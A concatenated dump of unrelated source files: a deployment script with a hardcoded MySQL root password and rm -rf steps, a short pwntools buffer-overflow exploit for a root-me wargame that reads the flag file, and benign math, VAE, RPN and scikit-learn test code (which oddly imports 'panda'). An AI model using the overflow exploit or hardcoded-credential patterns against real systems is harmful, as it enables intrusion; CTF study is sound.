mcu is OK!' if not err_cp: print 'OK! Copy the new mcu to /usr/local/bin is OK!' except: err_rm = 'Error! The command of remove the old mcu could not be done!Please check it!' err_cp = 'Error! The command of copy the new mcu to /usr/local/bin could not be done!Please check it!' else: print 'Warning! The target file mcu is not exists,Please it!' print_err(err_rm) print_err(err_cp) def restart_service(target_service): '''To restart the service of target_service''' re_cmd = ['service', target_service, 'restart'] try: subf_re = Popen(re_cmd, stdout=PIPE, stderr=PIPE) err_re = subf_re.stderr.read() if not err_re: print 'OK! The command of restart the service %s is OK!'%target_service except: err_re = 'Error! The command of restart the service %s colud not be done!'%target_service print_err(err_re) def print_err(s): '''To print the error if there is error''' if s: for i in s.split('\n'): print i def clean_old_dir(dir_path): '''To clean the old dir for the new dir using''' if os.path.exists(dir_path): cmd = ['rm', '-rf', dir_path] try: subf = Popen(cmd, stdout=PIPE, stderr=PIPE) err = subf.stderr.read() except: err = 'Error! The command of cleaning the old dir which is %s is not be done!Please it!'%dir_path return err def replace_siremis(dir_name): '''To remove the old siremis dir, and copy the new dir of siremis to /var/www''' #remove the old siremis dir dir_path = os.path.join('/var/www', dir_name) if os.path.exists(dir_path): rm_cmd = ['rm', '-rf', dir_path] try: subf_rm = Popen(rm_cmd, stdout=PIPE, stderr=PIPE) err_rm = subf_rm.stderr.read() if not err_rm: print 'OK! The command of remove the dir : %s is OK!'%dir_name except: err_rm = 'Error! The command of remove the dir : %s colud not be done!Please chech it!'%dir_name print_err(err_rm) #to cp the new siremis to /var/www src_path = os.path.join(conf['path_source'], dir_name) cp_cmd = ['cp', '-r', src_path, '/var/www'] try: subf_cp = Popen(cp_cmd, stdout=PIPE, stderr=PIPE) err_cp = subf_cp.stderr.read() if not err_cp: print 'OK! The command of copy the dir : %s to /var/www is OK!'%dir_name except: err_cp = 'Error! The command of copy the dir : %s to /var/www colud not be done!Please check it!'%dir_name print_err(err_cp) #to chown the owner of the dir siremis if os.path.exists(dir_path): ch_cmd = ['chown','-R', 'www-data:www-data', dir_path] try: subf_ch = Popen(ch_cmd, stdout=PIPE, stderr=PIPE) err_ch = subf_ch.stderr.read() if not err_ch: print 'OK! The command of chown the %s to www-data is OK!'%dir_name except: err_ch = 'Error! The command of chown the %s to www-data colud not be done!Please check it!'%dir_name print_err(err_ch) def purge_kernel(kernel): '''purge kernel 3.9.5 and 3.11.6''' cmd = ['apt-get','purge',kernel] try: subf = Popen(cmd,stderr=PIPE) err = subf.stderr.read() except: err = 'Error! The command of purge %s could not be done!'%kernel if err: print err def remove_rubbish(path): '''remove rubbish''' cmd = 'rm -Rf %s' %path try: subf = Popen(cmd,stderr=PIPE,shell=True) err = subf.stderr.read() except: err = 'Error! The command of remove %s could not be done!'%path if err: print err def get_file_md5(file_path): '''Get the file md5''' if os.path.exists(file_path): cmd = ['md5sum',file_path] try: subf = Popen(cmd,stderr=PIPE,stdout=PIPE) data = subf.stdout.read() err = subf.stderr.read() except: data = '' err = 'Error! The command of md5sum %s could not be done!'%file_path if err: print err if data: md5_value = data.split()[0].strip() else: print 'Warning! Could not get the %s md5 value!'%file_path else: md5_value = '' print 'Warning! The %s is not exists!'%file_path return md5_value def update_sql(db_name,sql_bak_name): '''update the mysql table''' md5_file = '%s/md5.txt'%conf['path_source'] if os.path.exists(md5_file): with open(md5_file,'r') as fp: old_md5 = fp.read().strip() else: old_md5 = '' ssh = ssh_down_load(conf['remote_ip'],conf['port'],'root',conf['root']) sftp = paramiko.SFTPClient.from_transport(ssh) remote_path = '%s/%s'%(conf['path_sql'],sql_bak_name) local_path = '%s/%s'%(conf['path_source'],sql_bak_name) try: sftp.get(remote_path,local_path) print 'OK! %s download sucessfully!'%sql_bak_name except: print 'Error! %s could not download!'%sql_bak_name ssh.close() if os.path.exists(local_path): new_md5 = get_file_md5(local_path) else: new_md5 = '' print 'Error! The file of md5 %s is not exists!'%local_path if not old_md5 == new_md5: cmd = 'mysql -uroot -pbroadeng %s < %s/%s' %(db_name,conf['path_source'],sql_bak_name) try: subf = Popen(cmd,stderr=PIPE,shell=True) err = subf.stderr.read() except: err = 'Error! The command of update of the mysql table %s could not be done!'%db_name if err: print err restart_service('mysql') restart_service('mcuWeb') with open(md5_file,'w') as fp_w: fp_w.write(new_md5) def close_sudo(): '''close sudo users''' cmd = ['cp','-f','/etc/sudoers.bak','/etc/sudoers'] try: subf = Popen(cmd,stderr=PIPE) err = subf.stderr.read() except: err = 'Error! The command of modify the sudoers could not be done!' if err: print err def main(): #update the mcu from git and tar it to tar_file git_update_tar(ssh_get_source(conf['remote_ip'],conf['port'],'broad',conf['broad']),conf['path_mcu'],'mcu') time.sleep(1) #down load the mcu tar_file scp_source(ssh_down_load(conf['remote_ip'],conf['port'],'root',conf['root']),conf['path_mcu'],'mcu') time.sleep(1) #clean the source clean_source(ssh_get_source(conf['remote_ip'],conf['port'],'broad',conf['broad']),conf['path_mcu'],'mcu') time.sleep(1) #tar zxvf mcu tar_zxvf('mcu') time.sleep(1) #make mcu and replace the old mcu mcu_make() time.sleep(1) #restart the mcu restart_service('mediamixer') #update the siremis from git and tar it to tar_file git_update_tar(ssh_get_source(conf['remote_ip'], conf['port'], 'broad', conf['broad']), conf['path_siremis'], 'siremis-4.0.0') time.sleep(1) #down load the siremis tar_file scp_source(ssh_down_load(conf['remote_ip'], conf['port'], 'root', conf['root']), conf['path_siremis'], 'siremis-4.0.0') time.sleep(1) #clean the source clean_source(ssh_get_source(conf['remote_ip'],conf['port'],'broad',conf['broad']),conf['path_siremis'],'siremis-4.0.0') time.sleep(1) #tar zxvf mcu tar_zxvf('siremis-4.0.0') time.sleep(1) #remove the old siremis and copy the new siremis to /var/www replace_siremis('siremis-4.0.0') time.sleep(1) #restart the apache2 to make sure it work restart_service('apache2') #update mysql table update_sql('kamailio','kamailio.sql') #purge the kernel purge_kernel('linux-image-3.11.6-031106-generic') purge_kernel('linux-image-3.9.5-030905-generic') #close sudoers close_sudo() #remove the rubbish remove_rubbish('/opt/*') remove_rubbish('/usr/local/src/*') if __name__ == '__main__': main()
79791e657d895150d196b1b657a4d3fecc3f369a
d50aee7c9ede6e17be1825b4ef124fdfd63b67bf
/wargames/root-me/basic2.py
fdbea4bda5383dd9a8a464468050939c8bf50d60
[]
no_license
geethna/Binary-Exploitation
c4512f8389fc2ef94954ba13ca60b63afd430967
ef22d7592cd536b08dcad503f744b31f73bb761b
refs/heads/master
2022-11-23T04:33:59.076903
2020-07-29T06:35:27
2020-07-29T06:35:27
283,412,565
0
0
null
null
null
null
UTF-8
Python
false
false
244
py
from pwn import * p = ssh(host='challenge02.root-me.org' ,user='app-systeme-ch15' ,password='app-systeme-ch15',port=2222) s=p.process(executable='./ch15') s.sendline('i' * 128 + '\x64\x84\x04\x08') s.sendline('cat .passwd') print s.recvline()
0d9dd9c943b6681df14ffab31032cc8d1c929a07
a0e6a780eb8789b4674a686997a3d9de9ad9c95c
/contracts/business_template/privacy_computation/Fiat-Shamir-ZK/contract_step45.py
e1bd0b4f7e3fdaf1db8c14492ba9eb4962748dc8
[ "Apache-2.0", "Apache-1.1" ]
permissive
freezehe/SmartDev-Contract
4e8d5d3670e59889500269a6207d1c855972cac7
ec31fb787bdab96703669b551f938e3c327fc00e
refs/heads/master
2023-06-29T09:12:14.049701
2021-08-04T13:39:18
2021-08-04T13:39:18
385,824,978
2
0
Apache-2.0
2021-07-14T05:34:01
2021-07-14T05:34:01
null
UTF-8
Python
false
false
337
py
import libnum import hashlib import random n=8269 g=11 password = "Hello" x = int(hashlib.sha256(password.encode()).hexdigest()[:8], 16) % n print('\n======Phase 4: Peggy recieves c and calculate r=v-cx, sends r to Victor==================') c = input("c= ") v = input("v= ") r = (int(v) - int(c) * x) % (n-1) print('r=v-cx =\t\t',r)
7469228ba95707cd19ef91526eeb6fb67073a8e4
276ceede3fe56f00af940732df478f045337b67c
/Loss_functions.py
4b8856c98b96e6d87b6c349432b09085e0ecbeb2
[]
no_license
Ali-Sahili/Generative_Architectures
32c4a122af567f4b48418e69b13210a76254932f
bd7ae32e149592221b622f2d3ab9a43c1daa89ca
refs/heads/master
2022-08-10T12:55:58.726022
2022-07-09T15:06:05
2022-07-09T15:06:05
255,911,670
4
1
null
null
null
null
UTF-8
Python
false
false
592
py
import torch from torch import nn # This function is used in the variational auto-encoder reconstruction_function = nn.MSELoss(size_average=False) def loss_function(recon_x, x, mu, logvar): """ recon_x: generating images x: origin images mu: latent mean logvar: latent log variance """ BCE = reconstruction_function(recon_x, x) # mse loss # loss = 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2) KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar) KLD = torch.sum(KLD_element).mul_(-0.5) # KL divergence return BCE + KLD
9c53e1a542d95c9a0bc8497a2a168df57c45e704
2a3a7f4940157f3d07700451b2633f60ba58abdc
/stack/150-Evaluate-Reverse-Polish-Notation/num_push_operator_pop2push1.py
7e80fad345956003b2ab85e49202df48460ea324
[]
no_license
moonlightshadow123/leetcode_solutions
cd8400eff270f0608995089ab0207240071a7c46
6e4fa7fba17292fe4e2511555d743f41259d5351
refs/heads/master
2021-05-24T03:43:49.949864
2020-04-11T03:55:27
2020-04-11T03:55:27
73,599,834
0
0
null
null
null
null
UTF-8
Python
false
false
881
py
import math class Solution(object): def evalRPN(self, tokens): """ :type tokens: List[str] :rtype: int """ operators = set(['+', '-', '*', '/']) stack = [] for token in tokens: if token in operators: y = stack[-1] del stack[-1] x = stack[-1] del stack[-1] stack.append(self.operate(x, y, token)) else: stack.append(int(token)) return stack[-1] def operate(self, x, y, token): if token == '+': return x + y elif token == '-': return x - y elif token == '*': return x * y elif token == '/': if x*y < 0: return int(math.ceil(float(x) / y)) else: return x / y
1086b526a49d9b0593b4fd44ca8ffb61a9479f33
6e820756b82ffbe9837348937e53f1a0ce0e6cca
/Lib/site-packages/sklearn/datasets/tests/test_openml.py
fa6b53d5132cbf961f655908b2a6fbb64b0f596f
[]
no_license
AndreasPatsimas/pms_papei
c2afd941de6ae234dd37784d746e794183ebb8d3
da10220ea468304c1066bed55b8f92ba9e5ada8a
refs/heads/master
2023-02-01T23:33:39.221747
2020-12-19T12:17:59
2020-12-19T12:17:59
321,115,913
0
0
null
null
null
null
UTF-8
Python
false
false
46,761
py
"""Test the openml loader. """ import gzip import json import numpy as np import os import re import scipy.sparse import sklearn import pytest from sklearn import config_context from sklearn.datasets import fetch_openml from sklearn.datasets._openml import (_open_openml_url, _arff, _DATA_FILE, _get_data_description_by_id, _get_local_path, _retry_with_clean_cache, _feature_to_dtype) from sklearn.utils._testing import (assert_warns_message, assert_raise_message) from sklearn.utils import is_scalar_nan from sklearn.utils._testing import assert_allclose, assert_array_equal from urllib.error import HTTPError from sklearn.datasets.tests.test_common import check_return_X_y from functools import partial currdir = os.path.dirname(os.path.abspath(__file__)) # if True, urlopen will be monkey patched to only use local files test_offline = True def _test_features_list(data_id): # XXX Test is intended to verify/ensure correct decoding behavior # Not usable with sparse data or datasets that have columns marked as # {row_identifier, ignore} def decode_column(data_bunch, col_idx): col_name = data_bunch.feature_names[col_idx] if col_name in data_bunch.categories: # XXX: This would be faster with np.take, although it does not # handle missing values fast (also not with mode='wrap') cat = data_bunch.categories[col_name] result = [None if is_scalar_nan(idx) else cat[int(idx)] for idx in data_bunch.data[:, col_idx]] return np.array(result, dtype='O') else: # non-nominal attribute return data_bunch.data[:, col_idx] data_bunch = fetch_openml(data_id=data_id, cache=False, target_column=None) # also obtain decoded arff data_description = _get_data_description_by_id(data_id, None) sparse = data_description['format'].lower() == 'sparse_arff' if sparse is True: raise ValueError('This test is not intended for sparse data, to keep ' 'code relatively simple') url = _DATA_FILE.format(data_description['file_id']) with _open_openml_url(url, data_home=None) as f: data_arff = _arff.load((line.decode('utf-8') for line in f), return_type=(_arff.COO if sparse else _arff.DENSE_GEN), encode_nominal=False) data_downloaded = np.array(list(data_arff['data']), dtype='O') for i in range(len(data_bunch.feature_names)): # XXX: Test per column, as this makes it easier to avoid problems with # missing values np.testing.assert_array_equal(data_downloaded[:, i], decode_column(data_bunch, i)) def _fetch_dataset_from_openml(data_id, data_name, data_version, target_column, expected_observations, expected_features, expected_missing, expected_data_dtype, expected_target_dtype, expect_sparse, compare_default_target): # fetches a dataset in three various ways from OpenML, using the # fetch_openml function, and does various checks on the validity of the # result. Note that this function can be mocked (by invoking # _monkey_patch_webbased_functions before invoking this function) data_by_name_id = fetch_openml(name=data_name, version=data_version, cache=False) assert int(data_by_name_id.details['id']) == data_id # Please note that cache=False is crucial, as the monkey patched files are # not consistent with reality fetch_openml(name=data_name, cache=False) # without specifying the version, there is no guarantee that the data id # will be the same # fetch with dataset id data_by_id = fetch_openml(data_id=data_id, cache=False, target_column=target_column) assert data_by_id.details['name'] == data_name assert data_by_id.data.shape == (expected_observations, expected_features) if isinstance(target_column, str): # single target, so target is vector assert data_by_id.target.shape == (expected_observations, ) assert data_by_id.target_names == [target_column] elif isinstance(target_column, list): # multi target, so target is array assert data_by_id.target.shape == (expected_observations, len(target_column)) assert data_by_id.target_names == target_column assert data_by_id.data.dtype == expected_data_dtype assert data_by_id.target.dtype == expected_target_dtype assert len(data_by_id.feature_names) == expected_features for feature in data_by_id.feature_names: assert isinstance(feature, str) # TODO: pass in a list of expected nominal features for feature, categories in data_by_id.categories.items(): feature_idx = data_by_id.feature_names.index(feature) values = np.unique(data_by_id.data[:, feature_idx]) values = values[np.isfinite(values)] assert set(values) <= set(range(len(categories))) if compare_default_target: # check whether the data by id and data by id target are equal data_by_id_default = fetch_openml(data_id=data_id, cache=False) np.testing.assert_allclose(data_by_id.data, data_by_id_default.data) if data_by_id.target.dtype == np.float64: np.testing.assert_allclose(data_by_id.target, data_by_id_default.target) else: assert np.array_equal(data_by_id.target, data_by_id_default.target) if expect_sparse: assert isinstance(data_by_id.data, scipy.sparse.csr_matrix) else: assert isinstance(data_by_id.data, np.ndarray) # np.isnan doesn't work on CSR matrix assert (np.count_nonzero(np.isnan(data_by_id.data)) == expected_missing) # test return_X_y option fetch_func = partial(fetch_openml, data_id=data_id, cache=False, target_column=target_column) check_return_X_y(data_by_id, fetch_func) return data_by_id def _monkey_patch_webbased_functions(context, data_id, gzip_response): # monkey patches the urlopen function. Important note: Do NOT use this # in combination with a regular cache directory, as the files that are # stored as cache should not be mixed up with real openml datasets url_prefix_data_description = "https://openml.org/api/v1/json/data/" url_prefix_data_features = "https://openml.org/api/v1/json/data/features/" url_prefix_download_data = "https://openml.org/data/v1/" url_prefix_data_list = "https://openml.org/api/v1/json/data/list/" path_suffix = '.gz' read_fn = gzip.open class MockHTTPResponse: def __init__(self, data, is_gzip): self.data = data self.is_gzip = is_gzip def read(self, amt=-1): return self.data.read(amt) def tell(self): return self.data.tell() def seek(self, pos, whence=0): return self.data.seek(pos, whence) def close(self): self.data.close() def info(self): if self.is_gzip: return {'Content-Encoding': 'gzip'} return {} def __iter__(self): return iter(self.data) def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): return False def _file_name(url, suffix): return (re.sub(r'\W', '-', url[len("https://openml.org/"):]) + suffix + path_suffix) def _mock_urlopen_data_description(url, has_gzip_header): assert url.startswith(url_prefix_data_description) path = os.path.join(currdir, 'data', 'openml', str(data_id), _file_name(url, '.json')) if has_gzip_header and gzip_response: fp = open(path, 'rb') return MockHTTPResponse(fp, True) else: fp = read_fn(path, 'rb') return MockHTTPResponse(fp, False) def _mock_urlopen_data_features(url, has_gzip_header): assert url.startswith(url_prefix_data_features) path = os.path.join(currdir, 'data', 'openml', str(data_id), _file_name(url, '.json')) if has_gzip_header and gzip_response: fp = open(path, 'rb') return MockHTTPResponse(fp, True) else: fp = read_fn(path, 'rb') return MockHTTPResponse(fp, False) def _mock_urlopen_download_data(url, has_gzip_header): assert (url.startswith(url_prefix_download_data)) path = os.path.join(currdir, 'data', 'openml', str(data_id), _file_name(url, '.arff')) if has_gzip_header and gzip_response: fp = open(path, 'rb') return MockHTTPResponse(fp, True) else: fp = read_fn(path, 'rb') return MockHTTPResponse(fp, False) def _mock_urlopen_data_list(url, has_gzip_header): assert url.startswith(url_prefix_data_list) json_file_path = os.path.join(currdir, 'data', 'openml', str(data_id), _file_name(url, '.json')) # load the file itself, to simulate a http error json_data = json.loads(read_fn(json_file_path, 'rb'). read().decode('utf-8')) if 'error' in json_data: raise HTTPError(url=None, code=412, msg='Simulated mock error', hdrs=None, fp=None) if has_gzip_header: fp = open(json_file_path, 'rb') return MockHTTPResponse(fp, True) else: fp = read_fn(json_file_path, 'rb') return MockHTTPResponse(fp, False) def _mock_urlopen(request): url = request.get_full_url() has_gzip_header = request.get_header('Accept-encoding') == "gzip" if url.startswith(url_prefix_data_list): return _mock_urlopen_data_list(url, has_gzip_header) elif url.startswith(url_prefix_data_features): return _mock_urlopen_data_features(url, has_gzip_header) elif url.startswith(url_prefix_download_data): return _mock_urlopen_download_data(url, has_gzip_header) elif url.startswith(url_prefix_data_description): return _mock_urlopen_data_description(url, has_gzip_header) else: raise ValueError('Unknown mocking URL pattern: %s' % url) # XXX: Global variable if test_offline: context.setattr(sklearn.datasets._openml, 'urlopen', _mock_urlopen) @pytest.mark.parametrize('feature, expected_dtype', [ ({'data_type': 'string', 'number_of_missing_values': '0'}, object), ({'data_type': 'string', 'number_of_missing_values': '1'}, object), ({'data_type': 'numeric', 'number_of_missing_values': '0'}, np.float64), ({'data_type': 'numeric', 'number_of_missing_values': '1'}, np.float64), ({'data_type': 'real', 'number_of_missing_values': '0'}, np.float64), ({'data_type': 'real', 'number_of_missing_values': '1'}, np.float64), ({'data_type': 'integer', 'number_of_missing_values': '0'}, np.int64), ({'data_type': 'integer', 'number_of_missing_values': '1'}, np.float64), ({'data_type': 'nominal', 'number_of_missing_values': '0'}, 'category'), ({'data_type': 'nominal', 'number_of_missing_values': '1'}, 'category'), ]) def test_feature_to_dtype(feature, expected_dtype): assert _feature_to_dtype(feature) == expected_dtype @pytest.mark.parametrize('feature', [ {'data_type': 'datatime', 'number_of_missing_values': '0'} ]) def test_feature_to_dtype_error(feature): msg = 'Unsupported feature: {}'.format(feature) with pytest.raises(ValueError, match=msg): _feature_to_dtype(feature) def test_fetch_openml_iris_pandas(monkeypatch): # classification dataset with numeric only columns pd = pytest.importorskip('panda') CategoricalDtype = pd.api.types.CategoricalDtype data_id = 61 data_shape = (150, 4) target_shape = (150, ) frame_shape = (150, 5) target_dtype = CategoricalDtype(['Iris-setosa', 'Iris-versicolor', 'Iris-virginica']) data_dtypes = [np.float64] * 4 data_names = ['sepallength', 'sepalwidth', 'petallength', 'petalwidth'] target_name = 'class' _monkey_patch_webbased_functions(monkeypatch, data_id, True) bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False) data = bunch.data target = bunch.target frame = bunch.frame assert isinstance(data, pd.DataFrame) assert np.all(data.dtypes == data_dtypes) assert data.shape == data_shape assert np.all(data.columns == data_names) assert np.all(bunch.feature_names == data_names) assert bunch.target_names == [target_name] assert isinstance(target, pd.Series) assert target.dtype == target_dtype assert target.shape == target_shape assert target.name == target_name assert target.index.is_unique assert isinstance(frame, pd.DataFrame) assert frame.shape == frame_shape assert np.all(frame.dtypes == data_dtypes + [target_dtype]) assert frame.index.is_unique def test_fetch_openml_iris_pandas_equal_to_no_frame(monkeypatch): # as_frame = True returns the same underlying data as as_frame = False pytest.importorskip('panda') data_id = 61 _monkey_patch_webbased_functions(monkeypatch, data_id, True) frame_bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False) frame_data = frame_bunch.data frame_target = frame_bunch.target norm_bunch = fetch_openml(data_id=data_id, as_frame=False, cache=False) norm_data = norm_bunch.data norm_target = norm_bunch.target assert_allclose(norm_data, frame_data) assert_array_equal(norm_target, frame_target) def test_fetch_openml_iris_multitarget_pandas(monkeypatch): # classification dataset with numeric only columns pd = pytest.importorskip('panda') CategoricalDtype = pd.api.types.CategoricalDtype data_id = 61 data_shape = (150, 3) target_shape = (150, 2) frame_shape = (150, 5) target_column = ['petalwidth', 'petallength'] cat_dtype = CategoricalDtype(['Iris-setosa', 'Iris-versicolor', 'Iris-virginica']) data_dtypes = [np.float64, np.float64] + [cat_dtype] data_names = ['sepallength', 'sepalwidth', 'class'] target_dtypes = [np.float64, np.float64] target_names = ['petalwidth', 'petallength'] _monkey_patch_webbased_functions(monkeypatch, data_id, True) bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False, target_column=target_column) data = bunch.data target = bunch.target frame = bunch.frame assert isinstance(data, pd.DataFrame) assert np.all(data.dtypes == data_dtypes) assert data.shape == data_shape assert np.all(data.columns == data_names) assert np.all(bunch.feature_names == data_names) assert bunch.target_names == target_names assert isinstance(target, pd.DataFrame) assert np.all(target.dtypes == target_dtypes) assert target.shape == target_shape assert np.all(target.columns == target_names) assert isinstance(frame, pd.DataFrame) assert frame.shape == frame_shape assert np.all(frame.dtypes == [np.float64] * 4 + [cat_dtype]) def test_fetch_openml_anneal_pandas(monkeypatch): # classification dataset with numeric and categorical columns pd = pytest.importorskip('panda') CategoricalDtype = pd.api.types.CategoricalDtype data_id = 2 target_column = 'class' data_shape = (11, 38) target_shape = (11,) frame_shape = (11, 39) expected_data_categories = 32 expected_data_floats = 6 _monkey_patch_webbased_functions(monkeypatch, data_id, True) bunch = fetch_openml(data_id=data_id, as_frame=True, target_column=target_column, cache=False) data = bunch.data target = bunch.target frame = bunch.frame assert isinstance(data, pd.DataFrame) assert data.shape == data_shape n_categories = len([dtype for dtype in data.dtypes if isinstance(dtype, CategoricalDtype)]) n_floats = len([dtype for dtype in data.dtypes if dtype.kind == 'f']) assert expected_data_categories == n_categories assert expected_data_floats == n_floats assert isinstance(target, pd.Series) assert target.shape == target_shape assert isinstance(target.dtype, CategoricalDtype) assert isinstance(frame, pd.DataFrame) assert frame.shape == frame_shape def test_fetch_openml_cpu_pandas(monkeypatch): # regression dataset with numeric and categorical columns pd = pytest.importorskip('panda') CategoricalDtype = pd.api.types.CategoricalDtype data_id = 561 data_shape = (209, 7) target_shape = (209, ) frame_shape = (209, 8) cat_dtype = CategoricalDtype(['adviser', 'amdahl', 'apollo', 'basf', 'bti', 'burroughs', 'c.r.d', 'cdc', 'cambex', 'dec', 'dg', 'formation', 'four-phase', 'gould', 'hp', 'harris', 'honeywell', 'ibm', 'ipl', 'magnuson', 'microdata', 'nas', 'ncr', 'nixdorf', 'perkin-elmer', 'prime', 'siemens', 'sperry', 'sratus', 'wang']) data_dtypes = [cat_dtype] + [np.float64] * 6 feature_names = ['vendor', 'MYCT', 'MMIN', 'MMAX', 'CACH', 'CHMIN', 'CHMAX'] target_name = 'class' _monkey_patch_webbased_functions(monkeypatch, data_id, True) bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False) data = bunch.data target = bunch.target frame = bunch.frame assert isinstance(data, pd.DataFrame) assert data.shape == data_shape assert np.all(data.dtypes == data_dtypes) assert np.all(data.columns == feature_names) assert np.all(bunch.feature_names == feature_names) assert bunch.target_names == [target_name] assert isinstance(target, pd.Series) assert target.shape == target_shape assert target.dtype == np.float64 assert target.name == target_name assert isinstance(frame, pd.DataFrame) assert frame.shape == frame_shape def test_fetch_openml_australian_pandas_error_sparse(monkeypatch): data_id = 292 _monkey_patch_webbased_functions(monkeypatch, data_id, True) msg = 'Cannot return dataframe with sparse data' with pytest.raises(ValueError, match=msg): fetch_openml(data_id=data_id, as_frame=True, cache=False) def test_convert_arff_data_dataframe_warning_low_memory_pandas(monkeypatch): pytest.importorskip('panda') data_id = 1119 _monkey_patch_webbased_functions(monkeypatch, data_id, True) msg = 'Could not adhere to working_memory config.' with pytest.warns(UserWarning, match=msg): with config_context(working_memory=1e-6): fetch_openml(data_id=data_id, as_frame=True, cache=False) def test_fetch_openml_adultcensus_pandas_return_X_y(monkeypatch): pd = pytest.importorskip('panda') CategoricalDtype = pd.api.types.CategoricalDtype data_id = 1119 data_shape = (10, 14) target_shape = (10, ) expected_data_categories = 8 expected_data_floats = 6 target_column = 'class' _monkey_patch_webbased_functions(monkeypatch, data_id, True) X, y = fetch_openml(data_id=data_id, as_frame=True, cache=False, return_X_y=True) assert isinstance(X, pd.DataFrame) assert X.shape == data_shape n_categories = len([dtype for dtype in X.dtypes if isinstance(dtype, CategoricalDtype)]) n_floats = len([dtype for dtype in X.dtypes if dtype.kind == 'f']) assert expected_data_categories == n_categories assert expected_data_floats == n_floats assert isinstance(y, pd.Series) assert y.shape == target_shape assert y.name == target_column def test_fetch_openml_adultcensus_pandas(monkeypatch): pd = pytest.importorskip('panda') CategoricalDtype = pd.api.types.CategoricalDtype # Check because of the numeric row attribute (issue #12329) data_id = 1119 data_shape = (10, 14) target_shape = (10, ) frame_shape = (10, 15) expected_data_categories = 8 expected_data_floats = 6 target_column = 'class' _monkey_patch_webbased_functions(monkeypatch, data_id, True) bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False) data = bunch.data target = bunch.target frame = bunch.frame assert isinstance(data, pd.DataFrame) assert data.shape == data_shape n_categories = len([dtype for dtype in data.dtypes if isinstance(dtype, CategoricalDtype)]) n_floats = len([dtype for dtype in data.dtypes if dtype.kind == 'f']) assert expected_data_categories == n_categories assert expected_data_floats == n_floats assert isinstance(target, pd.Series) assert target.shape == target_shape assert target.name == target_column assert isinstance(frame, pd.DataFrame) assert frame.shape == frame_shape def test_fetch_openml_miceprotein_pandas(monkeypatch): # JvR: very important check, as this dataset defined several row ids # and ignore attributes. Note that data_features json has 82 attributes, # and row id (1), ignore attributes (3) have been removed. pd = pytest.importorskip('panda') CategoricalDtype = pd.api.types.CategoricalDtype data_id = 40966 data_shape = (7, 77) target_shape = (7, ) frame_shape = (7, 78) target_column = 'class' frame_n_categories = 1 frame_n_floats = 77 _monkey_patch_webbased_functions(monkeypatch, data_id, True) bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False) data = bunch.data target = bunch.target frame = bunch.frame assert isinstance(data, pd.DataFrame) assert data.shape == data_shape assert np.all(data.dtypes == np.float64) assert isinstance(target, pd.Series) assert isinstance(target.dtype, CategoricalDtype) assert target.shape == target_shape assert target.name == target_column assert isinstance(frame, pd.DataFrame) assert frame.shape == frame_shape n_categories = len([dtype for dtype in frame.dtypes if isinstance(dtype, CategoricalDtype)]) n_floats = len([dtype for dtype in frame.dtypes if dtype.kind == 'f']) assert frame_n_categories == n_categories assert frame_n_floats == n_floats def test_fetch_openml_emotions_pandas(monkeypatch): # classification dataset with multiple targets (natively) pd = pytest.importorskip('panda') CategoricalDtype = pd.api.types.CategoricalDtype data_id = 40589 target_column = ['amazed.suprised', 'happy.pleased', 'relaxing.calm', 'quiet.still', 'sad.lonely', 'angry.aggresive'] data_shape = (13, 72) target_shape = (13, 6) frame_shape = (13, 78) expected_frame_categories = 6 expected_frame_floats = 72 _monkey_patch_webbased_functions(monkeypatch, data_id, True) bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False, target_column=target_column) data = bunch.data target = bunch.target frame = bunch.frame assert isinstance(data, pd.DataFrame) assert data.shape == data_shape assert isinstance(target, pd.DataFrame) assert target.shape == target_shape assert np.all(target.columns == target_column) assert isinstance(frame, pd.DataFrame) assert frame.shape == frame_shape n_categories = len([dtype for dtype in frame.dtypes if isinstance(dtype, CategoricalDtype)]) n_floats = len([dtype for dtype in frame.dtypes if dtype.kind == 'f']) assert expected_frame_categories == n_categories assert expected_frame_floats == n_floats def test_fetch_openml_titanic_pandas(monkeypatch): # dataset with strings pd = pytest.importorskip('panda') CategoricalDtype = pd.api.types.CategoricalDtype data_id = 40945 data_shape = (1309, 13) target_shape = (1309, ) frame_shape = (1309, 14) name_to_dtype = { 'pclass': np.float64, 'name': object, 'sex': CategoricalDtype(['female', 'male']), 'age': np.float64, 'sibsp': np.float64, 'parch': np.float64, 'ticket': object, 'fare': np.float64, 'cabin': object, 'embarked': CategoricalDtype(['C', 'Q', 'S']), 'boat': object, 'body': np.float64, 'home.dest': object, 'survived': CategoricalDtype(['0', '1']) } frame_columns = ['pclass', 'survived', 'name', 'sex', 'age', 'sibsp', 'parch', 'ticket', 'fare', 'cabin', 'embarked', 'boat', 'body', 'home.dest'] frame_dtypes = [name_to_dtype[col] for col in frame_columns] feature_names = ['pclass', 'name', 'sex', 'age', 'sibsp', 'parch', 'ticket', 'fare', 'cabin', 'embarked', 'boat', 'body', 'home.dest'] target_name = 'survived' _monkey_patch_webbased_functions(monkeypatch, data_id, True) bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False) data = bunch.data target = bunch.target frame = bunch.frame assert isinstance(data, pd.DataFrame) assert data.shape == data_shape assert np.all(data.columns == feature_names) assert bunch.target_names == [target_name] assert isinstance(target, pd.Series) assert target.shape == target_shape assert target.name == target_name assert target.dtype == name_to_dtype[target_name] assert isinstance(frame, pd.DataFrame) assert frame.shape == frame_shape assert np.all(frame.dtypes == frame_dtypes) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_iris(monkeypatch, gzip_response): # classification dataset with numeric only columns data_id = 61 data_name = 'iris' data_version = 1 target_column = 'class' expected_observations = 150 expected_features = 4 expected_missing = 0 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) assert_warns_message( UserWarning, "Multiple active versions of the dataset matching the name" " iris exist. Versions may be fundamentally different, " "returning version 1.", _fetch_dataset_from_openml, **{'data_id': data_id, 'data_name': data_name, 'data_version': data_version, 'target_column': target_column, 'expected_observations': expected_observations, 'expected_features': expected_features, 'expected_missing': expected_missing, 'expect_sparse': False, 'expected_data_dtype': np.float64, 'expected_target_dtype': object, 'compare_default_target': True} ) def test_decode_iris(monkeypatch): data_id = 61 _monkey_patch_webbased_functions(monkeypatch, data_id, False) _test_features_list(data_id) @pytest.mark.parametrize('gzip_response', 